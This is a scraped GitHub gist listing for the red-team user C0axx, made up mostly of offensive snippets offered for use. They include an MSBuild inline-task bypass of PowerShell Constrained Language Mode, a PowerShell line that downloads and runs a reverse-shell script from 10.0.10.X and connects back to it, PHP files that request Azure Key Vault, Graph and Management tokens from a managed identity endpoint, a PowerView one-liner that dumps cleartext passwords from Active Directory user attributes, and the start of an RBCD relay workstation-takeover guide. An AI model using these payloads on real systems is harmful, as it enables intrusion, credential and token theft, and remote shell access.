Skip to content

Instantly share code, notes, and snippets.

View C0axx's full-sized avatar

Curtis Ringwald C0axx

64 followers · 93 following
View GitHub Profile
@C0axx
C0axx / CLMBypass.csproj
Created April 9, 2020 16:49
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Target Name="Bypass">
<CLMBypass/>
</Target>
<UsingTask
TaskName="CLMBypass"
TaskFactory="CodeTaskFactory"
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
<Task>
<Reference Include="System.Management.Automation" />
@C0axx
C0axx / Queries.sh
Created August 21, 2023 16:59
#!/usr/bin/env bash
set -o errexit
set -o nounset
set -o pipefail
echo "[*] Creating temporary directory..."
TMPDIR="$(mktemp -d --suffix=_bloodhound-customqueries)"
# Compass BloodHound Customqueries
@C0axx
C0axx / ps-shell.ps1
Created January 3, 2023 20:38
iex (New-Object
Net.Webclient).downloadstring("http://10.0.10.X/reversetcp.ps1")
Invoke-PowerShellTcp -Reverse -IPAddress 10.0.10.X -Port 8888
@C0axx
C0axx / ConditonalAccess-Edge-UA
Created January 3, 2023 19:39
Mozilla/5.0 (Macintosh; Intel Mac OS X 12_3) AppleWebKit/605.1.15 (KHTML,
like Gecko) Version/15.3 Safari/605.1.15 Edg/100.0.4896.127
@C0axx
C0axx / Get-VaultToken.php
Last active January 3, 2023 18:28
Request Azure Keyvault Token
<?php
system('curl "$IDENTITY_ENDPOINT?resource=https://vault.azure.net/&api-version=2017-09-01" -H secret:$IDENTITY_HEADER');
?>
@C0axx
C0axx / Get-GraphToken.php
Created January 3, 2023 18:16
Request access tokens for Azure Graph services
<?php
system('curl "$IDENTITY_ENDPOINT?resource=https://graph.windows.net/&api-version=2017-09-01" -H secret:$IDENTITY_HEADER');
?>
@C0axx
C0axx / Get-ManagementToken.php
Last active January 3, 2023 18:16
Request access tokens for Azure Management services
<?php
system('curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com/&api-version=2017-09-01" -H secret:$IDENTITY_HEADER');
?>
@C0axx
C0axx / gist:334294bafa7bd83cc9625fc1cfe71a2a
Created October 29, 2022 19:36 — forked from dafthack/gist:5f8c36f7468fad991e9e1f6d81ec29d4
PowerView One-Liner to Dump Cleartext Passwords From AD User Attributes
$users = Get-NetUser; $props=@(); $users | Get-Member | foreach-object{if($_.Name -notlike "badpassword*"){$props+=$_.Name}}; foreach($user in $users){ foreach($prop in $props){ if($user.$prop -like "*password*" -and $user.$prop -notlike "*dont_expire_password" -and $user.$prop -notlike "*RODC Password*"){Write-Output ($user.samAccountName + "[" + $prop + "]" + " : " + $user.$prop) } } }
@C0axx
C0axx / Workstation-Takeover.md
Created September 25, 2022 00:17 — forked from mgeeky/Workstation-Takeover.md
From RPC to RCE - Workstation Takeover via RBCD and MS-RPChoose-Your-Own-Adventure

Overview

In the default configuration of Active Directory, it is possible to remotely take over Workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. This is accomplished in short by;

  • Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
  • Relaying that machine authentication to LDAPS for configuring RBCD
  • RBCD takeover

The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.

@C0axx
C0axx / Keybase.md
Created April 26, 2022 15:07

Keybase proof

I hereby claim:

  • I am c0axx on github.
  • I am c0axx (https://keybase.io/c0axx) on keybase.
  • I have a public key ASCQzho6XeMDopSCjSDM6aK-1ZgLmvNSEWiFP0b3BwHI-Ao

To claim this, I am signing this object: